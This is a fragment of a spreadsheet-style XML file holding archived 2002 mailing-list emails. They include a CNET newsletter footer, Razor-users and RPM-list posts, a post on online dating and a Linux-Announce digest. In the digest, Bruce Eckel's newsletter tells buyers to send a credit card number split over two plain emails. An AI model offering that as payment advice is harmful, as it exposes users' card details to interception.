 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=b6-ll1UrMKLBLlFrFG3lrCqXXqIP7Q05RRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsrcgJT0IjyXYHRf_uaHkFR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDH08xGStxkPhB7mxUT9A9R"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href="http://clickthru.online.com/Click?q=f5-lTbRQgwx1j6smFm6DmLwgkaZmRuR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrscyRQAefBwhq6GOxuYzsR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58w5nBYvph1xmYgHobjqmZR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIzY4Dm2gxKNXLTSyPWc3uR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcnXoLN2lsxoLkkTKhn-yR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2cAcqVs6fez6pa6cIJPR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e432&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=74-VAw8nFZ9X0kNWyUXbD16nz1dp9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] problems with hubris and/or discovery
</t>
  </si>
  <si>
    <t xml:space="preserve">trying to report spam [razor chooses hubris] I timeout on the connection
 (which seems to have gotten slower all morning) and receive the following
 error message:
 razor-report error: connect4: nextserver: discover1: Error reading socket
 connect4: nextserver: discover1: Error reading socket
 I then try to run razor-admin -discover and receive the same error .....
 problems with the servers today? only one discovery server?
 Sven
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [VoID] a new low on the personals tip...
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 18 September 2002 06:47 am, Robert Harley wrote:
 &gt; ....and with the crucial hair feature enabled!
 That got a good laugh out of me.   Just saying "crucial hair feature" 
 improves my day immeasurably.
 I've done a fair amount of thinking about the "media intermediated" meeting 
 thing.   It seriously loses for reasons like Rohit's just encountered.   
 One is both rejected for trivial reasons and rejects for the same.
 Some people loudly defend that these choices are not trivial.
 I'd have never met my best friend if I had to pick her out of a crowd for 
 getting to know.   I was a teen at the time, but I won't say I'm much 
 improved at being able to spot "interesting" at a distance.   Interesting 
 isn't an external thing.  I have that brought home to me again every so 
 often.  I may think that interesting people dress differently or whatever, 
 but that's total superstition.   How do I know what your version of 
 creative attire is?  Maybe it's purely functional.
 I was at a loud party recently, sufficiently loud that conversation of any 
 kind was extremely difficult, and intoxication was the norm.   I was 
 working on what my algorithm for meeting people there should be and one of 
 the candidates was "women, in order of attractiveness."   I flinched from 
 that, rather violently.   At a trade show, or something, I might elect to 
 talk to the people who are looking at interesting exhibits.   At a 
 party.....well, if you can't hear the conversation they are having, or if 
 on the net all you have is a photo.....
 You just can't tell important things from a picture and a few words.  It's 
 not how we are built.   There's no geek code for the heart and soul.
 (And if there were people would lie and game the system.)
 It's too easy to say "Oh, no!  He's a geek!"   or "She's a CAT person, 
 ick!" when you might have a great time together.
 We are constructed to form alliances based on how we fit together as 
 people, how we feel in the other person's company, how well we partner on 
 tasks and recreation.   This is all entirely speculative based on nothing 
 but superstitious association unless you actually have time in the 
 person's company.   Which is why we tend to be screwed when our circle of 
 exposure shrinks after school.
 Personally, as a writer, the whole internet meet &amp; email thing ought to 
 work better for me than it does for other people, but interestingly, it 
 doesn't.   I have to put out the same amount of effort and reap about the 
 same poor results.    I have to think it's not the people, but the tool.
 An aside (okay, yes, I'm a tool geek):  Speed Dating
 Speed Dating (aka 7 Minute Dating) is a live-action stab at actual time in 
 the company of a variety of people, compressed into one event.   I think 
 it's noticably better, but still absolutely nothing like working on a 
 project together, cooking, climbing a mountain or whatever.
 It was, in fact, invented as a jewish thing seeking to match up the young 
 people to avoid total assimilation.   It has too much "interview" context 
 and no shared activity beyond that.   I give it several points for effort 
 though. 
 I guess my impression that even the Speed Dating thing doesn't do much for 
 you means that the traditional advice of "join activities groups" is 
 actually sound.
 Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Priceless Rubens works stolen in raid on mansion
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381145,215/
 Date: 2002-09-30T03:04:58+01:00
 *Arts:* Fourth art raid on philanthropist's home once targeted by the IRA and 
 Dublin gangster Martin Cahill.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Problem with Razor 2.14 and Spamassassin 2.41
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --Enx9fNJ0XV5HaWRu
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Thu, Sep 05, 2002 at 06:16:57PM -0500, Mike Burger wrote:
 &gt; You might be better asking this on the spamassassin-talk list.  The folks=
 =20
 &gt; there will almost definitely have an answer for this.
 I posted a fairly lengthy complete answer to this problem and how to
 get around it in SA 2.41 on the spamassassin-talk list. :)
 --=20
 Randomly Generated Tagline:
 "Good judgment comes from bad experience, and a lot of that comes from
  bad judgment." - Zen Musings
 --Enx9fNJ0XV5HaWRu
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9d/x7AuOQUeWAs2MRAtAFAKDAv2ned2UEMjxqPm2PknM7USMCdgCggFr+
 ONI0BQ6UcqCITZKsDjr5hRc=
 =Wyzr
 -----END PGP SIGNATURE-----
 --Enx9fNJ0XV5HaWRu--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</si>
  <si>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New testing packages
</t>
  </si>
  <si>
    <t xml:space="preserve">Angles Puglisi (angles@aminvestments.com) wrote*:
 &gt;Also, they are developing rapidly in their CVS and looks like their next version
 &gt;of alsaplaer will be pretty cool, but I have no idea when it will be ready.
 ahh, oops they just released. -/
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject:  Linux-Announce Digest #180
</t>
  </si>
  <si>
    <t xml:space="preserve">Linux-Announce Digest #180, Volume #4           Sat, 7 Sep 2002 22:13:03 EDT
 Contents:
   OO Programming Newsletter #41 from Bruce Eckel (OOPList@BruceEckel.com)
   The Linux Counter... (Frederick Noronha)
   Linux Gazette #82 (September 2002) available (Linux Gazette)
   bigtwo: coffee.marilith.1 released (Bernard yap)
   NEWS: GNU/DEVELOPMENT... intl orgns take a close look at GNU/Linux (Frederick Noronha)
   Attn programmers: support offered [FLOSS-Sarai Initiative] (Frederick Noronha)
 ----------------------------------------------------------------------------
 From: OOPList@BruceEckel.com
 Subject: OO Programming Newsletter #41 from Bruce Eckel
 Date: 8 Sep 2002 01:25:28 GMT
 Reply-To: OOPList@BruceEckel.com
 To unsubscribe send a blank email to leave-eckel-oo-programming-6394293J@earth.lyris.net
 You are subscribed as linux-announce@sws1.ctd.ornl.gov 
 To modify your email address, go to http://earth.lyris.net/cgi-bin/lyris.pl?enter=eckel-oo-programming
 OO Programming Newsletter #41 from Bruce Eckel
 August 2002
 = = = Contents = = =
 * Come work on Thinking in Java in Crested Butte
 * Thinking in Java, 3rd edition, Revision 2 Imminent
 * Thinking in C++, Volume 2, Revision 6 Available
 * Thinking in Java Hands-on Seminar, Bay Area, November
 * Java2 Enterprise Programming Seminar, Bay Area, November
 * New seminars
 * Limited Number of Signed Copies of TIJ2 for sale
 See the Calendar for the current schedule:
 http://www.mindview.net/Calendar
 ===================================
 * Come work on Thinking in Java, 3rd edition, in Crested Butte
 All but one of the Interns has departed (he's staying through
 December) and we have empty rooms in the condo that I rented in Mt.
 Crested Butte for the Interns to stay in. If you'd like to
 volunteer to come up (Crested Butte is gorgeous in late
 Summer/early Fall, with excellent hiking and mountain biking), stay
 in the condo, and help work on the 3rd edition of Thinking in Java,
 please email Sharlynn@Mindview.net with your resume and
 availability dates (note that the book is due at the end of
 October). There will be a technical and writing test, and
 interviews to reveal how well you self-motivate and work with
 others.
 This should be a great learning experience and a fun time.
 ===================================
 * Thinking in Java, 3rd edition, Revision 2 Imminent
 The second revision will be up on the site soon, at:
 http://64.78.49.204/
 The biggest change is that I've rewritten significant part of the
 multithreading chapter (although it still has a ways to go). The
 goal is to rewrite the chapter to introduce the essence of
 threading with simplicity, and without GUI examples (this
 simplifies things, and allows threads to appear before GUIs).
 The chapters have also been reorganized into something like their
 final form, although the final chapter numbering hasn't been done
 yet. We have made more progress in the testing system.
 Other details of the changes made in the new version will be at the
 beginning of the book.
 The book is due at the end of October. The print version will
 appear in December.
 ===================================
 * Thinking in C++, Volume 2, Revision 9 Available tomorrow
 Available at:
 http://64.78.49.204/
 Chapters 1-4 are finished
 ===================================
 * Thinking in Java Hands-on Seminar
 November 4th-8th in San Francisco - Emeryville, CA.
 Registration opens on September 4th.
 http://www.mindview.net/Seminars/ThinkingInJava/
 Created by Bruce Eckel, taught by Andrea Provaglio. We believe this
 is the best in-depth introduction to Java that you'll find.  It's
 based on the book "Thinking in Java," which was created as the
 seminar evolved.
 Please note the early registration discount: 
 * $1,600 for payments received by October 12th
 * $1,950 for payments received after October 12th
 ===================================
 * Java2 Enterprise Programming Seminar
 November 18th-22th in San Francisco - Emeryville, CA.
 Registration opens on September 4th.
 http://www.mindview.net/Seminars/J2EE/
 Created and taught by Andrea Provaglio, this seminar introduces you
 to the practical development of real-world, Web-enabled,
 distributed applications with Java. It covers J2EE and its key
 technologies: Enterprise JavaBeans, Servlets, Java ServerPages, and
 the basic architectural patterns used to combine these technologies
 into maintainable applications. 
 Andrea has been teaching this course in the US and in Europe for
 the last two years, and he has recently restructured and updated
 the seminar to include the latest J2EE features.
 You'll come out of this course with a comprehensive understanding
 of the J2EE architecture, of the problems that it is designed to
 solve, how to select the most appropriate tools, and how to code
 your solutions.
 Please note the early registration discount: 
 * $1,700 for payments received by October 26th
 * $2,300 for payments received after October 26th
 ===================================
 * New seminars
 Bill Venners and I just finished giving the last "Objects &amp;
 Patterns" seminar, and everyone (especially us) had a great time.
 We are now beginning to work towards the two new seminars spawned
 by Objects &amp; Patterns, which Bill and I plan to teach together:
 Design Patterns in Java
 (Drawing primarily from "Thinking in Patterns")
 Designing Objects &amp; Systems
 This will include a lot of material from Bill's upcoming book on
 Object Design, along with coverage of UML, XP, Object-Oriented
 Design techniques and guidelines, and of course exercises and
 projects.
 We hope to begin teaching the courses early next year. Stay tuned.
 ===================================
 * Limited Number of Signed Copies of TIJ2 for sale
 I'm selling the last 17 of my author copies of Thinking in Java,
 2nd edition. I've signed each one and drawn a little cartoon with
 the signature (the books are in La Mesa, and I'm in Crested Butte,
 so unfortunately I can't personalize them). The cost in the USA is
 $40, which includes handling and mailing. Outside the USA, you'll
 have to email to the address below to find out the additional
 shipping cost.
 To order, divide your credit card number (Visa, MC, Amex) into two
 different emails (not high security, but highly likely to be safe),
 and include your credit card billing address and expiration date.
 Email your order to:
 Wayne@MindView.net
 Wayne will email you back to clarify any necessary details.
 ___| Until Next Time... |________________________
 Computer nerd humor
 http://www.valleyofthegeeks.com/
 Java programming questions:
 http://www.mindview.net/Books/TIJ/JavaQuestions.html
 Speaking &amp; Seminar schedule: 
 http://www.mindview.net/Calendar/
 Anyone can sign up for this free newsletter by visiting:
 http://www.mindview.net/mailman/listinfo/eckel-oo-programming 
 Bruce Eckel    http://www.mindview.net
 ---
 You are currently subscribed to eckel-oo-programming as: linux-announce@sws1.ctd.ornl.gov
 To unsubscribe send a blank email to leave-eckel-oo-programming-6394293J@earth.lyris.net
 ##########################################################################
 # Send submissions for comp.os.linux.announce to: cola@stump.algebra.com #
 # PLEASE remember a short description of the software and the LOCATION.  #
 # This group is archived at http://stump.algebra.com/~cola/              #
 ##########################################################################
 ------------------------------
 From: Frederick Noronha &lt;fred@bytesforall.org&gt;
 Subject: The Linux Counter...
 Date: 8 Sep 2002 01:25:32 GMT
 Please sign-up at the Linux Counter:
 Please visit it and sign up (if you haven't already) at 
 http://counter.li.org/
 Why?
 * It's a small way of saying 'thank you' to an excellent OS and
   acknowledging you find it useful... 
 * Letting everyone out there know where all GNU/Linux is being used
 * Building a useful database of GNU/Linux in your locality (Goa)
 * Finding out where all other people in Goa are using GNU/Linux.
 * Just seeing how this volunteer driven model builds itself by
   innovative styles of organising....
 FN
 ##########################################################################
 # Send submissions for comp.os.linux.announce to: cola@stump.algebra.com #
 # PLEASE remember a short description of the software and the LOCATION.  #
 # This group is archived at http://stump.algebra.com/~cola/              #
 ##########################################################################
 ------------------------------
 From: Linux Gazette &lt;gazette@ssc.com&gt;
 Subject: Linux Gazette #82 (September 2002) available
 Date: 8 Sep 2002 01:25:35 GMT
 Reply-To: gazette@ssc.com
 "Linux Gazette...Making Linux just a little more fun!"
 Linux Gazette is a freely available, WWW e-zine that includes short articles
 giving tips and tricks, ideas and suggestions for customizing and running
 Linux. It is a member of the Linux Documentation Project.
 Linux Gazette issue #82, September 2002, is out and can be found at: 
   http://www.linuxgazette.com/
 For download purposes, individual issues of LG are available at:
   ftp://ftp.ssc.com/pub/lg/
 A list of mirror sites can be found at:
   http://www.linuxgazette.com/mirrors.html
 While we do not mail issues of LG to our readers--it's just too big--we do
 have an announcement service. Write lg-announce-request@ssc.com with the
 word subscribe in the body, and each month you will receive an e-mail notice
 when we post Linux Gazette. 
 Topics in this issue include:
      * The MailBag
      * More 2-Cent Tips
      * The Answer Gang
      * News Bytes
      * Ecol , by Javier Malonda at escomposlinux.org
      * Qubism , by Jon "Sir Flakey" Harsem
      * Writing your own Toy OS - Part III , by Raghu and Chitkala
      * Kerberos: The watchdog of the Ether , by Raj Shekhar
      * My Guide To Digital Photography , by Rob Tougher
      * Adaptive Linux Firewalls , by Vasoo Veerapen
      * Multihead Systems under Linux and Windows , by Alan Ward
      * The Back Page
 Read all about it in Linux Gazette.
 Michael Orr
 Editor, Linux Gazette
 ##########################################################################
 # Send submissions for comp.os.linux.announce to: cola@stump.algebra.com #
 # PLEASE remember a short description of the software and the LOCATION.  #
 # This group is archived at http://stump.algebra.com/~cola/              #
 ##########################################################################
 ------------------------------
 From: Bernard yap &lt;lev@codenetic.net&gt;
 Subject: bigtwo: coffee.marilith.1 released
 Date: 8 Sep 2002 01:25:38 GMT
 Greetings to all,
 'bigtwo' is an cross-platform (tho' it's meant to run on linux) object oriented
 game engine for the card game of "cho dai di" with integrated artificial
 intelligence to simplify the job of developing game servers/clients for the
 card game.
 - Release [coffee.marilith.1] -
     This is an alpha release of the game engine (codenamed 'coffee') intended for
     engine/AI testing. A simulation test of AI playing against each other and a
     simple text-based single player client are included in the release for that
     purpose.
 - ChangeLog -
     o  some minor AI tweaks
     o  added game engine version information
     o  fixed bug in game initialization
     o  fixed bugs that blocked the straights 23456 &amp; A2345
 - Work in progress -
     o  further fixes/improvements on the game engine/AI
     o  a cross-platform GUI/graphical client.
 - SF Project Page -
       http://sourceforge.net/projects/bigtwo/
 - Download -
       https://sourceforge.net/project/showfiles.php?group_id=22941
 regards,
 -- 
 const char *me[] = { "Bernard", "http://www.codenetic.net/" };
 pain, n.: One thing, at least it proves that you're alive!
 ##########################################################################
 # Send submissions for comp.os.linux.announce to: cola@stump.algebra.com #
 # PLEASE remember a short description of the software and the LOCATION.  #
 # This group is archived at http://stump.algebra.com/~cola/              #
 ##########################################################################
 ------------------------------
 From: Frederick Noronha &lt;fred@bytesforall.org&gt;
 Subject: NEWS: GNU/DEVELOPMENT... intl orgns take a close look at GNU/Linux
 Date: 8 Sep 2002 01:25:42 GMT
 GNU/DEVELOPMENT, INTERNATIONAL ORGANISATION TAKE A CLOSE LOOK AT GNU/LINUX
 &gt;From Frederick Noronha
 INDIA: There's good news round the corner -- international organisations and
 prominent networks worldwide are waking up to the rich potential of
 Free/Open Source Software, a field that is slowly being recognised for the
 immense promise it holds out to the Third World.
 But can this be tapped speedily enough and effectively? 
 &gt;From the Unesco to the World Bank, and other global organisations, all are
 catching up on the potential of using GNU/Linux as a potent tool in working
 towards development. More so in countries where the cost of a proprietorial
 office suite could eat up six months or more of the average citizen's
 earnings.
 United Nation's Development Programme's Ms. Radhika Lal
 &lt;radhika.lal@undp.org&gt;, a Information-Communication Technology Policy
 Advisor, recently drew attention to a conference on Open Source for
 E-Government. It is to be held in Washington, DC on October 17-18.
 infoDev, the Cyberspace Policy Institute of The George Washington
 University, and the UNDP are jointly behind this event. It is intended to
 draw participants from local, national and international organizations from
 both the public and private sector.
 This meet intends to present cases of 'best practices', raise awareness
 about the potential of open source and free software for e-governance. More
 importantly, it will be sharing experiences among policy makers, donors,
 users and consumers, universities, and industry specialists in Open Source,
 e-Government and related fields.
 Ms Lal works at the ICT-for-Development's Special Initiative Bureau for
 Development Policy at the UNDP's East 45th Street offices in New York.
 ICT-for-development is a campaign to use more of infotech and the Internet
 for global development and fighting problems like poverty and illiteracy.
 But despite quite a few shared goals and concerns with the GNU/Linux world,
 so far little networking has been done between these two separate circles.
 See http://www.egovos.org/
 OTHER ARMS OF THE U.N.
 ======================
 Besides, the UNDP, other arms of the United Nations are also known to be
 showing increasing interest in the potential of free software/open source
 tools. 
 Paris-headquartered Unesco (United Nations Education, Scientific and
 Cultural Organisation) recently launched its own Free Software portal. 
 It's at http://www.unesco.org/webworld/portal_freesoft.
 UNESCO's Jean-Claude Dauphin &lt;jc.dauphin@unesco.org&gt; of the Information
 Society Division also announced that this international organisation has
 been looking out for contributors with a good knowledge of the Free Software
 movement in relation with UNESCO fields of competence -- education, science
 and culture.
 It zeroed in particularly on those coming from the Third World (also called
 the 'South' countries) who could could make propositions for "revising,
 updating and extending the UNESCO Free Software Portal" as well as for
 including new basic documents. 
 "This work could be done using a fee or consultant contract and the fee can
 be discussed depending on the amount of work described in the contract,"
 said Dauphin. 
 Check out the sites at
 UNESCO Libraries Portal (http://www.unesco.org/webworld/portal_bib/)
 UNESCO Archives Portal (http://www.unesco.org/webworld/portal_archives/)
 UNESCO Free Software Portal (http://www.unesco.org/webworld/portal_freesoft/)
 UNESCO Observatory on the Information Society (http://www.unesco.org/webworld/observatory/)
 NEW TOOLS FOR CDS/ISIS
 ======================
 Recently, Unesco also announced the launch of new tools for data exchange
 from and to its CDS/ISIS software. These two new tools -- ImpExp2709 and
 IsisAscii v 0.92 -- have recently been released for data exchange from and
 to UNESCO's software package CDS/ISIS. 
 CDS/ISIS is a generalized information storage and retrieval system that is
 freely distributed, and has attracted users in places like libraries within
 the Third World. The new utilities have been released with their source code
 (GPL license). 
 See http://www.unesco.org/webworld/news/2002/020806_isis.shtml
 Meanwhile, UNDP's APDIP (Asia-Pacific Development Information Programme)
 based in Kuala Lumpur, Malaysia, is also learnt to be thinking seriously
 about organizing some kind of a consultation on open source, GNU/Linux and
 related issues.
 "We want to see how we can further this cause in the region," APDIP's Shahid
 Akhtar told this correspondent.
 Niranjan Rajani &lt;niranjan.rajani@maailma.net&gt;, of Pakistani origin but based
 in the birthplace of Linux, Finland, is now working on a research project on
 "Significance of Free/OpenSource Software for Developing Countries".
 This project is financed by the Finnish Foreign Ministry, and he has
 undertaken to write the paper by the end of November this year, for
 Maailma.Net, a local division of OneWorld.Net.
 This project's goal is to find out, evaluate and analyze the extent of use
 of FS/OSS, especially some of its most significant and popular projects;
 GNU/Linux, Apache, Mozilla, OpenOffice etc. in the developing or Third World
 countries. It will also look at its possible impact on economies, societies
 and lives of these countries.
 CONVINCING GOVERNMENTS
 ======================
 In India, organisations like Red Hat have been putting out slick
 presentations to convince governments and officials to try out Open Source. 
 Shift over boldly to the world of 'open source' and 'free' software. That's
 the message that governments across India were recently with, as official
 computerisation efforts get bogged down due to spiraling software costs and
 speedy software-fuelled hardware obsolence.
 Senior IT and e-governance officials from across the country tuned in
 attentively during a recent seminar in Goa, as executives from computing
 giant IBM and leading Linux systems supplier Red Hat India narrated long
 lists of benefits that governments could get from going the Linux way.
 Pointing to examples from across the globe, Red Hat India argued that the US
 Department of Energy has built supercomputers on GNU/Linux, the Chinese are
 making Linux the official server operating system -- to be widely used in
 varsities, military installations and within government. 
 Some months back, an organisation under India's Ministry of Information
 Technology -- called the ER&amp;DCI (Electronics Research and Development Centre
 of India) -- entered into a strategic alliance with leading Linux systems
 supplier Red Hat India to popularize the 'open source' solution in the
 government sector.
 On networks like the EDC/World Bank-support GKD (Global Knowledge for
 Development), issues of free software and open source often make it to the
 news.
 GNU/Linux is a suitable tool in organising too, as it was recently pointed
 out. (See http://www.lincproject.org)
 "The Low Income Networking and Communication (LINC) Project of the Welfare
 Law Center has helped many low-income led organizing groups acquire access
 to the Internet and use technology more effectively," says Dirk Slater
 &lt;dirk@welfarelaw.org&gt;. 
 While these groups have increased their abilities to communicate with one
 another and their allies by using the Internet, one communication hurdle
 remains -- communicating with their leadership via the Internet. 
 Despite many "digital divide" initiatives addressing access to the Internet
 in low-income communities, access is still an issue. 
 Public Internet access points, such as libraries and schools, are not
 sufficient, as Slater has pointed out. Many low-income leaders do not have
 access to the Internet where it would make the most impact -- in their
 homes. 
 LINC argues that the need for Internet communication is particularly great
 for rural groups whose members live far apart and cannot have frequent
 face-to-face meetings because of distance, time and money constraints.
 "We began to explore the idea of using Linux, a free operating system that
 works well on older computers, when we learned of Microsoft's decision to
 discontinue support of its older operating systems like Windows 95&lt;
 according to Slater, who is 'senior circuit rider' for the Low-Income
 Networking and Communications (LINC) Project at the Welfare Law Center.
 LINC protagonists say they had also been "troubled" by the frequent problems
 that occur for Windows users just by having Windows run on its own. "Giving
 a person who lives in a rural area an older computer with Windows seemed
 like we were just asking for trouble. We also attempted to identify similar
 projects but had limited success," says Slater. 
 LINC wanted to increase its ability to provide stable desktop systems using
 donated computers for board members and leaders of low-income led
 organizations that LINC serves. 
 "Our goal is to increase the ability of LINC Project partner groups to use
 open-source software to support their organizing work. We also wanted to
 document the project as much as we possibly could, so we could provide
 details of our experiences for others doing similar projects," LINC
 explains.
 LINC identified a partner in Grass Roots Organizing in Mexico, MO, and
 installed GNU/Linux on 10 computers used as stand-alone workstations in
 people's homes. GNU/Linux was also installed on a brand new stand-alone
 computer to work as the main computer in the GRO office.
 Links were built with the Mizzou Linux Users Group for ongoing local
 support.
 "We still have a long way to go before we can call this a completely
 successful project. After a period of a few months we will assess whether
 the board members are actually using the computers to communicate more
 effectively," said Slater.
 To view the daily journals on the project with GRO please visit the LINC
 Project Linux pages at &lt;http://www.lincproject.org/toolkit/linux&gt;
 NEED TO NETWORK
 ===============
 Bala Pillai &lt;bala@tamil.net&gt;, who was earlier based in Malaysia and now in
 Sydney-Australia, is founder of Tamil Innaiyam (http://www.tamil.net), an
 organisation to promote the Tamil language worldwide. He points to the
 impact GNU/Linux is making in some distant areas of the Third World.
 Says Pillai: "The most interactive open source/Linux community in our time
 zone/Asia springs out of the Philippines. Primarily because the Filipino
 psyche is a more secure psyche, a more self-confident psyche. 
 "Folks who are self-confident worry about the future less, and allocate more
 time diagnosing and solving problems rather than echoing and re-echoing it.
 Filipinos are also more into sharing and online sharing -- we should look to
 more symbiosis with them," says he. 
 Pillai also notes that the Manila-based Miguel Paraz, whom he interacted
 with since 1996, is a key catalyst in the Filipino Linux community.
 "http://www.q-linux.com is a good starting point to get a feel for the key
 Open Source catalysts in the Philippines," says he. 
 Kuala Lumpur, Malaysia-based Dinesh who runs http://www.alphaque.com is
 another lead Open Source catalyst from the region, explains Pillai. "Do look
 for symbiosis opportunities there too," he suggests. 
 "I see lots of room for us to symbiosis together. For example, there is
 likely to be areas where we diagnosing, documenting, analyzing, coding or
 publicizing where there is over-duplication. If we coordinated ourselves and
 found out where our circles and priorities intersect , we could share this
 work and get fruits out faster," he adds.
 --
 Frederick Noronha * Freelance Journalist * Goa * India 832.409490 / 409783
 BYTESFORALL www.bytesforall.org  * GNU-LINUX http://linuxinindia.pitas.com
 Email fred@bytesforall.org * Mobile +9822 122436 (Goa) * Saligao Goa India
 Writing with a difference... on what makes *the* difference
 ##########################################################################
 # Send submissions for comp.os.linux.announce to: cola@stump.algebra.com #
 # PLEASE remember a short description of the software and the LOCATION.  #
 # This group is archived at http://stump.algebra.com/~cola/              #
 ##########################################################################
 ------------------------------
 From: Frederick Noronha &lt;fred@bytesforall.org&gt;
 Subject: Attn programmers: support offered [FLOSS-Sarai Initiative]
 Date: 8 Sep 2002 01:25:45 GMT
 Dear friends,
 Can we manage to get some money into backing Free/Libre Open Source
 Software initiatives, that would help young volunteers out there to
 support their cash-strapped initiatives? 
 Sarai.net, a Delhi-based initiative under the CSDS (Centre for the Study
 of Developing Societies) has been solidly supportive of such an idea.
 Jeebesh Bagchi &lt;jeebesh@sarai.net&gt; sent in this offer recently. It could
 surely be of help particularly to college students and others wanting to
 make a break in Free Software/Open Source, but hamstrung by resources. 
 It might help if projects are initially kept small and definitely 
 workable, I guess. This is my own gut-level feeling, but maybe bigger
 initiatives which are clearly workable could also prove convincing. If
 such experiments prove useful, maybe there would be a good case for
 greater support to free software/open source developers in regions like
 ours. --FN
 ========== Forwarded message ==========
 The Sarai Programme, Centre for the Study of Developing Societies, Delhi
 (www.sarai.net) invites applications for Support Grants to projects in the
 area of Free Software, Open Source Software and Social Usage of Software
 Sarai invites programmers (practictioners as well as students) to
 propose projects in the area of free and open source software applications
 relevant to educational, social and community needs.  We are looking for
 original ideas, as well as proposals to localize and adapt existing software
 and applications to South Asian conditions,
 For example - Desktops in Hindi, Open Office and Gimp in Hindi. Lighter
 versions of desktops like KDE, Innovations that creatively optimises older
 lower configuration machines, Linux documentation in Hindi, games using local
 context, etc.
 What is Sarai
 Sarai is a public initiative of media practitioners and scholars looking at
 media cultures and urban life. Sarai's interests are in the field of old and
 new media, information and communication technologies, free software, cinema,
 and urban space - its politics, built form, ecology, culture and history,
 with a strong commitment to making knowledge available in the public domain.
 It is a programme of the Centre for the Study of Developing Societies, Delhi.
 For more information visit www.sarai.net. Sarai is committed to promoting the
 free software and open source vision.
 Conditions:
 Applicants should be resident in India, and should have a bank account in any
 bank operating in India.
 These are support grants and grantees will be free to pursue their primary
 occupations, if any.
 Mail your project proposal, workplan and CV to both the following addresses:
 &lt;application@sarai.net&gt; with a copy to &lt;fred@bytesforall.org&gt;. Please mark
 your subjectline 'FLOSS (Free/Libre Open Source Software) Initiative'. 
 Also point out what you see as the relevance of your work, and how you
 plan to share the resultant software once finalised.
 Enquires: dak@sarai.net
 Last date for submission: October 15th, 2002.
 Note: Proposals from teams, partnerships, collectives, faculty are welcome,
 so long as the grant amount is administered by a single individual, and the
 funds are deposited in a single bank account in the name of an individual.
 =======================================================
 ##########################################################################
 # Send submissions for comp.os.linux.announce to: cola@stump.algebra.com #
 # PLEASE remember a short description of the software and the LOCATION.  #
 # This group is archived at http://stump.algebra.com/~cola/              #
 ##########################################################################
 ------------------------------
 ** FOR YOUR REFERENCE **
 The service address, to which questions about the list itself and requests
 to be added to or deleted from it should be directed, is:
     Internet: Linux-Announce-Request@NEWS-DIGESTS.MIT.EDU
 You can submit announcements to be moderated via:
     Internet: linux-announce@NEWS.ORNL.GOV
 Linux may be obtained via one of these FTP sites:
     ftp.funet.fi				pub/Linux
     tsx-11.mit.edu				pub/linux
     sunsite.unc.edu				pub/Linux
 End of Linux-Announce Digest
 ******************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Joshua wrote :
 &gt; Just a thought, would it be possible to generalize this ALSA 
 &gt; stuff to make building a kernel with *any* custom/optional/updated
 &gt; modules an easy thing? I think some scripts or at least step-by-step
 &gt; instructions would be great. 
 &gt; 
 &gt; For example, to build a kernel RPM with ALSA do:
 &gt; 1. get the kernel source
 &gt; 2. get the ALSA source
 &gt; 3. run the custom-kernel.sh script
 &gt; ...
 &gt; 
 &gt; Or a kernel RPM with the lastest wireless LAN drivers:
 &gt; 1. get the kernel source
 &gt; 2. get the CVS driver source
 &gt; 3. run the custom-kernel.sh script
 &gt; ...
 &gt; 
